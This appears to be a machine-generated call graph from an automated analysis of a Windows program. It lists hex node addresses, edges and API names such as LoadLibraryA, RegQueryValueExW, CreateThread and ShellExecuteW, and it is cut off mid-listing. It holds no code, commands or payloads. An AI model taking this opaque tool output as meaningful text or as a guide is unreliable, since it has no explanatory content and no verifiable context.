103961->103968 103962->103961 103965 bf3907 Shell_NotifyIconW 103962->103965 103966 bf6b7c 8 API calls 103963->103966 103967 bf6b7c 8 API calls 103964->103967 103965->103961 103969 c33d43 103966->103969 103976 c33d5b GetForegroundWindow ShellExecuteW 103967->103976 103970 bf34ca 103968->103970 103971 bf7bb5 8 API calls 103969->103971 103970->103851 103973 c33d51 103971->103973 103975 bf6b7c 8 API calls 103973->103975 103974 c33d90 103974->103961 103975->103976 103976->103974 103977->103917 103981 c23319 LeaveCriticalSection 103978->103981 103980 c15311 103980->103919 103981->103980 103982->103924 103983->103926 103985 bfbf73 8 API calls 103984->103985 103986 bf4fef 103985->103986 104090 bf63d7 103986->104090 103988 bf500d 103989 bfbd57 8 API calls 103988->103989 103990 bf5021 103989->103990 103991 bfbed9 8 API calls 103990->103991 103992 bf502c 103991->103992 104104 bf893c 103992->104104 103995 bfb329 8 API calls 103996 bf5045 103995->103996 103997 bfbe2d 39 API calls 103996->103997 103998 bf5055 103997->103998 103999 bfb329 8 API calls 103998->103999 104000 bf507b 103999->104000 104001 bfbe2d 39 API calls 104000->104001 104002 bf508a 104001->104002 104003 bfbf73 8 API calls 104002->104003 104004 bf50a8 104003->104004 104107 bf51ca 104004->104107 104007 c14d98 _strftime 40 API calls 104008 bf50c2 104007->104008 104009 c34b23 104008->104009 104010 bf50cc 104008->104010 104012 bf51ca 8 API calls 104009->104012 104011 c14d98 _strftime 40 API calls 104010->104011 104013 bf50d7 104011->104013 104014 c34b37 104012->104014 104013->104014 104015 bf50e1 104013->104015 104016 bf51ca 8 API calls 104014->104016 104017 c14d98 _strftime 40 API calls 104015->104017 104018 c34b53 104016->104018 104019 bf50ec 104017->104019 104021 bf5594 10 API calls 104018->104021 104019->104018 104020 bf50f6 104019->104020 104022 c14d98 _strftime 40 API calls 104020->104022 104023 c34b76 104021->104023 104024 bf5101 104022->104024 104025 bf51ca 8 API calls 104023->104025 104026 c34b9f 104024->104026 104027 bf510b 104024->104027 104028 c34b82 104025->104028 104030 bf51ca 8 API calls 104026->104030 104029 bf512e 104027->104029 104033 bfbed9 8 API calls 104027->104033 104032 bfbed9 8 API calls 104028->104032 104031 c34bda 104029->104031 104036 bf7e12 8 API calls 104029->104036 104034 c34bbd 104030->104034 104037 c34b90 104032->104037 104038 bf5121 104033->104038 104035 bfbed9 8 API calls 104034->104035 104040 c34bcb 104035->104040 104041 bf513e 104036->104041 104042 bf51ca 8 API calls 104037->104042 104039 bf51ca 8 API calls 104038->104039 104039->104029 104043 bf51ca 8 API calls 104040->104043 104044 bf8470 8 API calls 104041->104044 104042->104026 104043->104031 104045 bf514c 104044->104045 104113 bf8a60 104045->104113 104047 bf5167 104048 bf893c 8 API calls 104047->104048 104049 bf8a60 8 API calls 104047->104049 104050 bf51ab 104047->104050 104051 bf51ca 8 API calls 104047->104051 104048->104047 104049->104047 104050->103933 104051->104047 104053 bf3aa2 __wsopen_s 104052->104053 104054 bf3abb 104053->104054 104055 c340da ___scrt_fastfail 104053->104055 104056 bf5851 9 API calls 104054->104056 104057 c340f6 GetOpenFileNameW 104055->104057 104058 bf3ac4 104056->104058 104059 c34145 104057->104059 104126 bf3a57 104058->104126 104061 bf8577 8 API calls 104059->104061 104063 c3415a 104061->104063 104063->104063 104065 bf3ad9 104144 bf62d5 104065->104144 104761 bf3624 7 API calls 104084->104761 104086 bf347a 104087 bf35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104086->104087 104087->103954 104088->103944 104089->103951 104091 bf63e4 __wsopen_s 104090->104091 104092 bf8577 8 API calls 104091->104092 104093 bf6416 104091->104093 104092->104093 104094 bf655e 8 API calls 104093->104094 104103 bf644c 104093->104103 104094->104093 104095 bfb329 8 API calls 104097 bf6543 104095->104097 104096 bfb329 8 API calls 104096->104103 104098 bf6a7c 8 API calls 104097->104098 104100 bf654f 104098->104100 104099 bf655e 8 API calls 104099->104103 104100->103988 104101 bf6a7c 8 API calls 104101->104103 104102 bf651a 104102->104095 104102->104100 104103->104096 104103->104099 104103->104101 104103->104102 104105 c1014b 8 API calls 104104->104105 104106 bf5038 104105->104106 104106->103995 104108 bf51d4 104107->104108 104109 bf51f2 104107->104109 104110 bf50b4 104108->104110 104112 bfbed9 8 API calls 104108->104112 104111 bf8577 8 API calls 104109->104111 104110->104007 104111->104110 104112->104110 104114 bf8a76 104113->104114 104115 c36737 104114->104115 104120 bf8a80 104114->104120 104124 c0b7a2 8 API calls 104115->104124 104117 c36744 104125 bfb4c8 8 API calls 104117->104125 104119 c36762 104119->104119 104120->104117 104121 bf8b94 104120->104121 104123 bf8b9b 104120->104123 104122 c1014b 8 API calls 104121->104122 104122->104123 104123->104047 104124->104117 104125->104119 104127 c322d0 __wsopen_s 104126->104127 104128 bf3a64 GetLongPathNameW 104127->104128 104129 bf8577 8 API calls 104128->104129 104130 bf3a8c 104129->104130 104131 bf53f2 104130->104131 104132 bfbf73 8 API calls 104131->104132 104133 bf5404 104132->104133 104134 bf5851 9 API calls 104133->104134 104135 bf540f 104134->104135 104136 bf541a 104135->104136 104137 c34d5b 104135->104137 104138 bf6a7c 8 API calls 104136->104138 104143 c34d7d 104137->104143 104180 c0e36b 41 API calls 104137->104180 104140 bf5426 104138->104140 104174 bf1340 104140->104174 104142 bf5439 104142->104065 104181 bf6679 104144->104181 104147 c35336 104306 c636b8 104147->104306 104148 bf6679 93 API calls 104151 bf630e 104148->104151 104151->104147 104154 bf6316 104151->104154 104157 c35353 104154->104157 104158 bf6322 104154->104158 104175 bf1352 104174->104175 104179 bf1371 __fread_nolock 104174->104179 104177 c1017b 8 API calls 104175->104177 104176 c1014b 8 API calls 104178 bf1388 104176->104178 104177->104179 104178->104142 104179->104176 104180->104137 104360 bf663e LoadLibraryA 104181->104360 104186 c35648 104189 bf66e7 68 API calls 104186->104189 104187 bf66a4 LoadLibraryExW 104368 bf6607 LoadLibraryA 104187->104368 104191 c3564f 104189->104191 104193 bf6607 3 API calls 104191->104193 104194 c35657 104193->104194 104389 bf684a 104194->104389 104195 bf66ce 104195->104194 104196 bf66da 104195->104196 104198 bf66e7 68 API calls 104196->104198 104200 bf62fa 104198->104200 104200->104147 104200->104148 104307 c636d4 104306->104307 104308 bf6874 64 API calls 104307->104308 104309 c636e8 104308->104309 104361 bf6656 GetProcAddress 104360->104361 104362 bf6674 104360->104362 104363 bf6666 104361->104363 104365 c1e95b 104362->104365 104363->104362 104364 bf666d FreeLibrary 104363->104364 104364->104362 104397 c1e89a 104365->104397 104367 bf6698 104367->104186 104367->104187 104369 bf661c GetProcAddress 104368->104369 104370 bf663b 104368->104370 104371 bf662c 104369->104371 104373 bf6720 104370->104373 104371->104370 104372 bf6634 FreeLibrary 104371->104372 104372->104370 104374 c1017b 8 API calls 104373->104374 104375 bf6735 104374->104375 104376 bf423c 8 API calls 104375->104376 104378 bf6741 __fread_nolock 104376->104378 104377 c356c2 104455 c63a92 74 API calls 104377->104455 104378->104377 104385 bf677c 104378->104385 104454 c63a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104378->104454 104381 bf684a 40 API calls 104381->104385 104382 c35706 104449 bf6874 104382->104449 104383 bf6810 messages 104383->104195 104384 bf6874 64 API calls 104384->104385 104385->104381 104385->104382 104385->104383 104385->104384 104390 c35760 104389->104390 104391 bf685c 104389->104391 104487 c1ec34 104391->104487 104394 c632bd 104596 c6310d 104394->104596 104399 c1e8a6 CallCatchBlock 104397->104399 104398 c1e8b4 104422 c1f649 20 API calls __dosmaperr 104398->104422 104399->104398 104402 c1e8e4 104399->104402 104401 c1e8b9 104423 c22b5c 26 API calls __cftof 104401->104423 104404 c1e8f6 104402->104404 104405 c1e8e9 104402->104405 104414 c283e1 104404->104414 104424 c1f649 20 API calls __dosmaperr 104405->104424 104408 c1e8ff 104409 c1e905 104408->104409 104411 c1e912 104408->104411 104425 c1f649 20 API calls __dosmaperr 104409->104425 104426 c1e944 LeaveCriticalSection __fread_nolock 104411->104426 104413 c1e8c4 __wsopen_s 104413->104367 104415 c283ed CallCatchBlock 104414->104415 104427 c232d1 EnterCriticalSection 104415->104427 104417 c283fb 104428 c2847b 104417->104428 104421 c2842c __wsopen_s 104421->104408 104422->104401 104423->104413 104424->104413 104425->104413 104426->104413 104427->104417 104437 c2849e 104428->104437 104429 c284f7 104430 c24ff0 __dosmaperr 20 API calls 104429->104430 104432 c28500 104430->104432 104433 c22d38 _free 20 API calls 104432->104433 104434 c28509 104433->104434 104436 c28408 104434->104436 104446 c23778 11 API calls 2 library calls 104434->104446 104441 c28437 104436->104441 104437->104429 104437->104436 104444 c194fd EnterCriticalSection 104437->104444 104445 c19511 LeaveCriticalSection 104437->104445 104438 c28528 104447 c194fd EnterCriticalSection 104438->104447 104448 c23319 LeaveCriticalSection 104441->104448 104443 c2843e 104443->104421 104444->104437 104445->104437 104446->104438 104447->104436 104448->104443 104450 c35780 104449->104450 104451 bf6883 104449->104451 104456 c1f053 104451->104456 104454->104377 104455->104385 104459 c1ee1a 104456->104459 104460 c1ee26 CallCatchBlock 104459->104460 104461 c1ee32 104460->104461 104463 c1ee58 104460->104463 104484 c1f649 20 API calls __dosmaperr 104461->104484 104472 c194fd EnterCriticalSection 104463->104472 104464 c1ee37 104485 c22b5c 26 API calls __cftof 104464->104485 104467 c1ee64 104473 c1ef7a 104467->104473 104472->104467 104484->104464 104490 c1ec51 104487->104490 104489 bf686d 104489->104394 104491 c1ec5d CallCatchBlock 104490->104491 104492 c1ec70 ___scrt_fastfail 104491->104492 104493 c1ec9d 104491->104493 104494 c1ec95 __wsopen_s 104491->104494 104517 c1f649 20 API calls __dosmaperr 104492->104517 104503 c194fd EnterCriticalSection 104493->104503 104494->104489 104496 c1eca7 104504 c1ea68 104496->104504 104499 c1ec8a 104518 c22b5c 26 API calls __cftof 104499->104518 104503->104496 104507 c1ea7a ___scrt_fastfail 104504->104507 104510 c1ea97 104504->104510 104505 c1ea87 104592 c1f649 20 API calls __dosmaperr 104505->104592 104507->104505 104507->104510 104513 c1eada __fread_nolock 104507->104513 104508 c1ea8c 104519 c1ecdc LeaveCriticalSection __fread_nolock 104510->104519 104511 c1ebf6 ___scrt_fastfail 104595 c1f649 20 API calls __dosmaperr 104511->104595 104513->104510 104513->104511 104520 c1dcc5 104513->104520 104527 c290c5 104513->104527 104594 c1d2e8 26 API calls 4 library calls 104513->104594 104517->104499 104518->104494 104519->104494 104521 c1dcd1 104520->104521 104522 c1dce6 104520->104522 104523 c1f649 __dosmaperr 20 API calls 104521->104523 104522->104513 104528 c290d7 104527->104528 104529 c290ef 104527->104529 104531 c1f636 __dosmaperr 20 API calls 104528->104531 104530 c29459 104529->104530 104536 c29134 104529->104536 104592->104508 104594->104513 104595->104508 104599 c1e858 104596->104599 104602 c1e7d9 104599->104602 104601 c1e875 104603 c1e7e8 104602->104603 104604 c1e7fc 104602->104604 104610 c1f649 20 API calls __dosmaperr 104603->104610 104609 c1e7f8 __alldvrm 104604->104609 104612 c236b2 11 API calls 2 library calls 104604->104612 104607 c1e7ed 104609->104601 104610->104607 104612->104609 104761->104086 103423 c4400f 103424 bfeeb0 messages 103423->103424 103425 bff211 PeekMessageW 103424->103425 103426 bfef07 GetInputState 103424->103426 103428 c432cd TranslateAcceleratorW 103424->103428 103429 bff104 timeGetTime 103424->103429 103430 bff28f PeekMessageW 103424->103430 103431 bff273 TranslateMessage DispatchMessageW 103424->103431 103432 bff2af Sleep 103424->103432 103433 c44183 Sleep 103424->103433 103435 c433e9 timeGetTime 103424->103435 103446 bff0d5 103424->103446 103449 c44060 103424->103449 103452 c00340 224 API calls 103424->103452 103453 c02b20 224 API calls 103424->103453 103455 bff450 103424->103455 103462 bff6d0 103424->103462 103485 c0e915 103424->103485 103490 c0f215 timeGetTime 103424->103490 103492 c6446f 8 API calls 103424->103492 103493 c63fe1 81 API calls __wsopen_s 103424->103493 103425->103424 103426->103424 103426->103425 103428->103424 103429->103424 103430->103424 103431->103430 103432->103424 103433->103449 103491 c0aa65 9 API calls 103435->103491 103438 c5dd87 46 API calls 103438->103449 103439 c4421a GetExitCodeProcess 103441 c44246 CloseHandle 103439->103441 103442 c44230 WaitForSingleObject 103439->103442 103440 c8345b GetForegroundWindow 103440->103449 103441->103449 103442->103424 103442->103441 103444 c43d51 103444->103446 103445 c442b8 Sleep 103445->103424 103449->103424 103449->103438 103449->103439 103449->103440 103449->103444 103449->103445 103494 c760b5 8 API calls 103449->103494 103495 c5f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103449->103495 103496 c0f215 timeGetTime 103449->103496 103452->103424 103453->103424 103456 bff46f 103455->103456 103458 bff483 103455->103458 103497 bfe960 103456->103497 103529 c63fe1 81 API calls __wsopen_s 103458->103529 103459 bff47a 103459->103424 103461 c44584 103461->103461 103463 bff707 103462->103463 103479 bff7dc messages 103463->103479 103550 c105b2 5 API calls __Init_thread_wait 103463->103550 103466 c445d9 103468 bfbf73 8 API calls 103466->103468 103466->103479 103467 bfbf73 8 API calls 103467->103479 103470 c445f3 103468->103470 103551 c10413 29 API calls __onexit 103470->103551 103474 c445fd 103552 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103474->103552 103477 c00340 224 API calls 103477->103479 103478 bfbed9 8 API calls 103478->103479 103479->103467 103479->103477 103479->103478 103480 bffae1 103479->103480 103481 c01ca0 8 API calls 103479->103481 103482 c63fe1 81 API calls 103479->103482 103545 bfbe2d 103479->103545 103549 c0b35c 224 API calls 103479->103549 103553 c105b2 5 API calls __Init_thread_wait 103479->103553 103554 c10413 29 API calls __onexit 103479->103554 103555 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103479->103555 103556 c75231 101 API calls 103479->103556 103557 c7731e 224 API calls 103479->103557 103480->103424 103481->103479 103482->103479 103486 c0e959 103485->103486 103487 c0e928 103485->103487 103486->103424 103487->103486 103488 c0e94c IsDialogMessageW 103487->103488 103489 c4eff6 GetClassLongW 103487->103489 103488->103486 103488->103487 103489->103487 103489->103488 103490->103424 103491->103424 103492->103424 103493->103424 103494->103449 103495->103449 103496->103449 103498 c00340 224 API calls 103497->103498 103499 bfe99d 103498->103499 103500 bfedd5 103499->103500 103502 bfea0b messages 103499->103502 103503 bfeac3 103499->103503 103508 bfebb8 103499->103508 103514 c431d3 103499->103514 103518 c1014b 8 API calls 103499->103518 103524 bfeb29 __fread_nolock messages 103499->103524 103500->103502 103512 c1017b 8 API calls 103500->103512 103502->103459 103503->103500 103505 bfeace 103503->103505 103504 bfecff 103506 c431c4 103504->103506 103507 bfed14 103504->103507 103509 c1014b 8 API calls 103505->103509 103542 c76162 8 API calls 103506->103542 103511 c1014b 8 API calls 103507->103511 103513 c1017b 8 API calls 103508->103513 103517 bfead5 __fread_nolock 103509->103517 103521 bfeb6a 103511->103521 103512->103517 103513->103524 103543 c63fe1 81 API calls __wsopen_s 103514->103543 103515 c1014b 8 API calls 103516 bfeaf6 103515->103516 103516->103524 103530 bfd260 103516->103530 103517->103515 103517->103516 103518->103499 103520 c431b3 103541 c63fe1 81 API calls __wsopen_s 103520->103541 103521->103459 103524->103504 103524->103520 103524->103521 103525 c4318e 103524->103525 103527 c4316c 103524->103527 103538 bf44fe 224 API calls 103524->103538 103540 c63fe1 81 API calls __wsopen_s 103525->103540 103539 c63fe1 81 API calls __wsopen_s 103527->103539 103529->103461 103531 bfd29a 103530->103531 103533 bfd2c6 103530->103533 103532 bff6d0 224 API calls 103531->103532 103536 bfd2a0 103531->103536 103532->103536 103534 c00340 224 API calls 103533->103534 103535 c4184b 103534->103535 103535->103536 103544 c63fe1 81 API calls __wsopen_s 103535->103544 103536->103524 103538->103524 103539->103521 103540->103521 103541->103521 103542->103514 103543->103502 103544->103536 103546 bfbe38 103545->103546 103547 bfbe67 103546->103547 103558 bfbfa5 103546->103558 103547->103479 103549->103479 103550->103466 103551->103474 103552->103479 103553->103479 103554->103479 103555->103479 103556->103479 103557->103479 103575 bfcf80 103558->103575 103560 bfbfb5 103561 c40db6 103560->103561 103562 bfbfc3 103560->103562 103584 bfb4c8 8 API calls 103561->103584 103564 c1014b 8 API calls 103562->103564 103566 bfbfd4 103564->103566 103565 c40dc1 103567 bfbf73 8 API calls 103566->103567 103569 bfbfde 103567->103569 103568 bfbfed 103571 c1014b 8 API calls 103568->103571 103569->103568 103570 bfbed9 8 API calls 103569->103570 103570->103568 103572 bfbff7 103571->103572 103583 bfbe7b 39 API calls 103572->103583 103574 bfc01b 103574->103547 103576 bfd1c7 103575->103576 103581 bfcf93 103575->103581 103576->103560 103578 bfbf73 8 API calls 103578->103581 103579 bfd03d 103579->103560 103581->103578 103581->103579 103585 c105b2 5 API calls __Init_thread_wait 103581->103585 103586 c10413 29 API calls __onexit 103581->103586 103587 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103581->103587 103583->103574 103584->103565 103585->103581 103586->103581 103587->103581 103588 bf1033 103593 bf68b4 103588->103593 103592 bf1042 103594 bfbf73 8 API calls 103593->103594 103595 bf6922 103594->103595 103601 bf589f 103595->103601 103597 bf69bf 103598 bf1038 103597->103598 103604 bf6b14 8 API calls __fread_nolock 103597->103604 103600 c10413 29 API calls __onexit 103598->103600 103600->103592 103605 bf58cb 103601->103605 103604->103597 103606 bf58be 103605->103606 103607 bf58d8 103605->103607 103606->103597 103607->103606 103608 bf58df RegOpenKeyExW 103607->103608 103608->103606 103609 bf58f9 RegQueryValueExW 103608->103609 103610 bf592f RegCloseKey 103609->103610 103611 bf591a 103609->103611 103610->103606 103611->103610 104762 c1f06e 104763 c1f07a CallCatchBlock 104762->104763 104764 c1f086 104763->104764 104765 c1f09b 104763->104765 104781 c1f649 20 API calls __dosmaperr 104764->104781 104775 c194fd EnterCriticalSection 104765->104775 104768 c1f08b 104782 c22b5c 26 API calls __cftof 104768->104782 104769 c1f0a7 104776 c1f0db 104769->104776 104774 c1f096 __wsopen_s 104775->104769 104784 c1f106 104776->104784 104778 c1f0e8 104780 c1f0b4 104778->104780 104804 c1f649 20 API calls __dosmaperr 104778->104804 104783 c1f0d1 LeaveCriticalSection __fread_nolock 104780->104783 104781->104768 104782->104774 104783->104774 104785 c1f114 104784->104785 104786 c1f12e 104784->104786 104808 c1f649 20 API calls __dosmaperr 104785->104808 104788 c1dcc5 __fread_nolock 26 API calls 104786->104788 104790 c1f137 104788->104790 104789 c1f119 104809 c22b5c 26 API calls __cftof 104789->104809 104805 c29789 104790->104805 104793 c1f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104793->104778 104795 c1f23b 104797 c1f248 104795->104797 104803 c1f1ee 104795->104803 104796 c1f1bf 104799 c1f1dc 104796->104799 104796->104803 104811 c1f649 20 API calls __dosmaperr 104797->104811 104810 c1f41f 31 API calls 4 library calls 104799->104810 104801 c1f1e6 104801->104793 104803->104793 104812 c1f29b 30 API calls 2 library calls 104803->104812 104804->104780 104813 c29606 104805->104813 104807 c1f153 104807->104793 104807->104795 104807->104796 104808->104789 104809->104793 104810->104801 104811->104793 104812->104793 104814 c29612 CallCatchBlock 104813->104814 104815 c29632 104814->104815 104816 c2961a 104814->104816 104817 c296e6 104815->104817 104823 c2966a 104815->104823 104848 c1f636 20 API calls __dosmaperr 104816->104848 104853 c1f636 20 API calls __dosmaperr 104817->104853 104819 c2961f 104849 c1f649 20 API calls __dosmaperr 104819->104849 104822 c296eb 104854 c1f649 20 API calls __dosmaperr 104822->104854 104838 c254ba EnterCriticalSection 104823->104838 104826 c296f3 104855 c22b5c 26 API calls __cftof 104826->104855 104827 c29670 104829 c29694 104827->104829 104830 c296a9 104827->104830 104850 c1f649 20 API calls __dosmaperr 104829->104850 104839 c2970b 104830->104839 104831 c29627 __wsopen_s 104831->104807 104834 c296a4 104852 c296de LeaveCriticalSection __wsopen_s 104834->104852 104835 c29699 104851 c1f636 20 API calls __dosmaperr 104835->104851 104838->104827 104840 c25737 __wsopen_s 26 API calls 104839->104840 104841 c2971d 104840->104841 104842 c29736 SetFilePointerEx 104841->104842 104843 c29725 104841->104843 104845 c2974e GetLastError 104842->104845 104846 c2972a 104842->104846 104856 c1f649 20 API calls __dosmaperr 104843->104856 104857 c1f613 20 API calls __dosmaperr 104845->104857 104846->104834 104848->104819 104849->104831 104850->104835 104851->104834 104852->104831 104853->104822 104854->104826 104855->104831 104856->104846 104857->104846 103612 c46555 103613 c1014b 8 API calls 103612->103613 103614 c4655c 103613->103614 103615 c1017b 8 API calls 103614->103615 103617 c46575 __fread_nolock 103614->103617 103615->103617 103616 c1017b 8 API calls 103618 c4659a 103616->103618 103617->103616 103619 c45650 103628 c0e3d5 103619->103628 103621 c45666 103627 c456e1 103621->103627 103637 c0aa65 9 API calls 103621->103637 103624 c461d7 103625 c456c1 103625->103627 103638 c6247e 8 API calls 103625->103638 103627->103624 103639 c63fe1 81 API calls __wsopen_s 103627->103639 103629 c0e3e3 103628->103629 103630 c0e3f6 103628->103630 103640 bfb4c8 8 API calls 103629->103640 103632 c0e429 103630->103632 103633 c0e3fb 103630->103633 103641 bfb4c8 8 API calls 103632->103641 103635 c1014b 8 API calls 103633->103635 103636 c0e3ed 103635->103636 103636->103621 103637->103625 103638->103627 103639->103624 103640->103636 103641->103636 104858 c2947a 104859 c29487 104858->104859 104862 c2949f 104858->104862 104908 c1f649 20 API calls __dosmaperr 104859->104908 104861 c2948c 104909 c22b5c 26 API calls __cftof 104861->104909 104864 c294fa 104862->104864 104872 c29497 104862->104872 104910 c30144 21 API calls 2 library calls 104862->104910 104866 c1dcc5 __fread_nolock 26 API calls 104864->104866 104867 c29512 104866->104867 104878 c28fb2 104867->104878 104869 c29519 104870 c1dcc5 __fread_nolock 26 API calls 104869->104870 104869->104872 104871 c29545 104870->104871 104871->104872 104873 c1dcc5 __fread_nolock 26 API calls 104871->104873 104874 c29553 104873->104874 104874->104872 104875 c1dcc5 __fread_nolock 26 API calls 104874->104875 104876 c29563 104875->104876 104877 c1dcc5 __fread_nolock 26 API calls 104876->104877 104877->104872 104879 c28fbe CallCatchBlock 104878->104879 104880 c28fc6 104879->104880 104881 c28fde 104879->104881 104912 c1f636 20 API calls __dosmaperr 104880->104912 104882 c290a4 104881->104882 104886 c29017 104881->104886 104919 c1f636 20 API calls __dosmaperr 104882->104919 104885 c28fcb 104913 c1f649 20 API calls __dosmaperr 104885->104913 104889 c29026 104886->104889 104890 c2903b 104886->104890 104887 c290a9 104920 c1f649 20 API calls __dosmaperr 104887->104920 104914 c1f636 20 API calls __dosmaperr 104889->104914 104911 c254ba EnterCriticalSection 104890->104911 104892 c28fd3 __wsopen_s 104892->104869 104895 c2902b 104915 c1f649 20 API calls __dosmaperr 104895->104915 104896 c29041 104898 c29072 104896->104898 104899 c2905d 104896->104899 104901 c290c5 __fread_nolock 38 API calls 104898->104901 104916 c1f649 20 API calls __dosmaperr 104899->104916 104904 c2906d 104901->104904 104902 c29033 104921 c22b5c 26 API calls __cftof 104902->104921 104918 c2909c LeaveCriticalSection __wsopen_s 104904->104918 104905 c29062 104917 c1f636 20 API calls __dosmaperr 104905->104917 104908->104861 104909->104872 104910->104864 104911->104896 104912->104885 104913->104892 104914->104895 104915->104902 104916->104905 104917->104904 104918->104892 104919->104887 104920->104902 104921->104892 103642 bff5e5 103645 bfcab0 103642->103645 103646 bfcacb 103645->103646 103647 c4150c 103646->103647 103648 c414be 103646->103648 103674 bfcaf0 103646->103674 103685 c762ff 224 API calls 2 library calls 103647->103685 103651 c414c8 103648->103651 103654 c414d5 103648->103654 103648->103674 103683 c76790 224 API calls 103651->103683 103653 c0bc58 8 API calls 103653->103674 103671 bfcdc0 103654->103671 103684 c76c2d 224 API calls 2 library calls 103654->103684 103657 bfcf80 39 API calls 103657->103674 103658 c4179f 103658->103658 103661 c0e807 39 API calls 103661->103674 103662 bfcdee 103664 c416e8 103688 c76669 81 API calls 103664->103688 103667 bfbe2d 39 API calls 103667->103674 103671->103662 103689 c63fe1 81 API calls __wsopen_s 103671->103689 103672 c00340 224 API calls 103672->103674 103673 bfbed9 8 API calls 103673->103674 103674->103653 103674->103657 103674->103661 103674->103662 103674->103664 103674->103667 103674->103671 103674->103672 103674->103673 103676 c0e7c1 39 API calls 103674->103676 103677 c0aa99 224 API calls 103674->103677 103678 c105b2 5 API calls __Init_thread_wait 103674->103678 103679 c10413 29 API calls __onexit 103674->103679 103680 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103674->103680 103681 c0f4df 81 API calls 103674->103681 103682 c0f346 224 API calls 103674->103682 103686 bfb4c8 8 API calls 103674->103686 103687 c4ffaf 8 API calls 103674->103687 103676->103674 103677->103674 103678->103674 103679->103674 103680->103674 103681->103674 103682->103674 103683->103654 103684->103671 103685->103674 103686->103674 103687->103674 103688->103671 103689->103658 104922 bf1044 104927 bf2793 104922->104927 104924 bf104a 104963 c10413 29 API calls __onexit 104924->104963 104926 bf1054 104964 bf2a38 104927->104964 104931 bf280a 104932 bfbf73 8 API calls 104931->104932 104933 bf2814 104932->104933 104934 bfbf73 8 API calls 104933->104934 104935 bf281e 104934->104935 104936 bfbf73 8 API calls 104935->104936 104937 bf2828 104936->104937 104938 bfbf73 8 API calls 104937->104938 104939 bf2866 104938->104939 104940 bfbf73 8 API calls 104939->104940 104941 bf2932 104940->104941 104974 bf2dbc 104941->104974 104945 bf2964 104946 bfbf73 8 API calls 104945->104946 104947 bf296e 104946->104947 104948 c03160 9 API calls 104947->104948 104949 bf2999 104948->104949 105001 bf3166 104949->105001 104951 bf29b5 104952 bf29c5 GetStdHandle 104951->104952 104953 c339e7 104952->104953 104954 bf2a1a 104952->104954 104953->104954 104955 c339f0 104953->104955 104957 bf2a27 OleInitialize 104954->104957 104956 c1014b 8 API calls 104955->104956 104958 c339f7 104956->104958 104957->104924 105008 c60ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 104958->105008 104960 c33a00 105009 c612eb CreateThread 104960->105009 104962 c33a0c CloseHandle 104962->104954 104963->104926 105010 bf2a91 104964->105010 104967 bf2a91 8 API calls 104968 bf2a70 104967->104968 104969 bfbf73 8 API calls 104968->104969 104970 bf2a7c 104969->104970 104971 bf8577 8 API calls 104970->104971 104972 bf27c9 104971->104972 104973 bf327e 6 API calls 104972->104973 104973->104931 104975 bfbf73 8 API calls 104974->104975 104976 bf2dcc 104975->104976 104977 bfbf73 8 API calls 104976->104977 104978 bf2dd4 104977->104978 105017 bf81d6 104978->105017 104981 bf81d6 8 API calls 104982 bf2de4 104981->104982 104983 bfbf73 8 API calls 104982->104983 104984 bf2def 104983->104984 104985 c1014b 8 API calls 104984->104985 104986 bf293c 104985->104986 104987 bf3205 104986->104987 104988 bf3213 104987->104988 104989 bfbf73 8 API calls 104988->104989 104990 bf321e 104989->104990 104991 bfbf73 8 API calls 104990->104991 104992 bf3229 104991->104992 104993 bfbf73 8 API calls 104992->104993 104994 bf3234 104993->104994 104995 bfbf73 8 API calls 104994->104995 104996 bf323f 104995->104996 104997 bf81d6 8 API calls 104996->104997 104998 bf324a 104997->104998 104999 c1014b 8 API calls 104998->104999 105000 bf3251 RegisterWindowMessageW 104999->105000 105000->104945 105002 bf3176 105001->105002 105003 c33c8f 105001->105003 105005 c1014b 8 API calls 105002->105005 105020 c63c4e 8 API calls 105003->105020 105007 bf317e 105005->105007 105006 c33c9a 105007->104951 105008->104960 105009->104962 105021 c612d1 14 API calls 105009->105021 105011 bfbf73 8 API calls 105010->105011 105012 bf2a9c 105011->105012 105013 bfbf73 8 API calls 105012->105013 105014 bf2aa4 105013->105014 105015 bfbf73 8 API calls 105014->105015 105016 bf2a66 105015->105016 105016->104967 105018 bfbf73 8 API calls 105017->105018 105019 bf2ddc 105018->105019 105019->104981 105020->105006 103690 c0235c 103699 c02365 __fread_nolock 103690->103699 103691 bf8ec0 52 API calls 103691->103699 103692 c474e3 103702 c513c8 8 API calls __fread_nolock 103692->103702 103694 c474ef 103698 bfbed9 8 API calls 103694->103698 103700 c01ff7 __fread_nolock 103694->103700 103695 c023b6 103696 bf7d74 8 API calls 103695->103696 103696->103700 103697 c1014b 8 API calls 103697->103699 103698->103700 103699->103691 103699->103692 103699->103695 103699->103697 103699->103700 103701 c1017b 8 API calls 103699->103701 103701->103699 103702->103694 105022 bff4c0 105025 c0a025 105022->105025 105024 bff4cc 105026 c0a046 105025->105026 105031 c0a0a3 105025->105031 105028 c00340 224 API calls 105026->105028 105026->105031 105032 c0a077 105028->105032 105029 c4806b 105029->105029 105030 c0a0e7 105030->105024 105031->105030 105034 c63fe1 81 API calls __wsopen_s 105031->105034 105032->105030 105032->105031 105033 bfbed9 8 API calls 105032->105033 105033->105031 105034->105029 105035 c00ebf 105036 c00ed3 105035->105036 105042 c01425 105035->105042 105037 c00ee5 105036->105037 105039 c1014b 8 API calls 105036->105039 105040 c4562c 105037->105040 105041 c00f3e 105037->105041 105068 bfb4c8 8 API calls 105037->105068 105039->105037 105069 c61b14 8 API calls 105040->105069 105043 c02b20 224 API calls 105041->105043 105048 c0049d messages 105041->105048 105042->105037 105045 bfbed9 8 API calls 105042->105045 105047 c00376 messages 105043->105047 105045->105037 105046 c4632b 105073 c63fe1 81 API calls __wsopen_s 105046->105073 105047->105046 105047->105048 105049 c01e50 40 API calls 105047->105049 105050 c01695 105047->105050 105051 c1014b 8 API calls 105047->105051 105053 c4625a 105047->105053 105054 bfbed9 8 API calls 105047->105054 105055 c45cdb 105047->105055 105059 c105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105047->105059 105060 c01990 224 API calls 105047->105060 105062 bfbf73 8 API calls 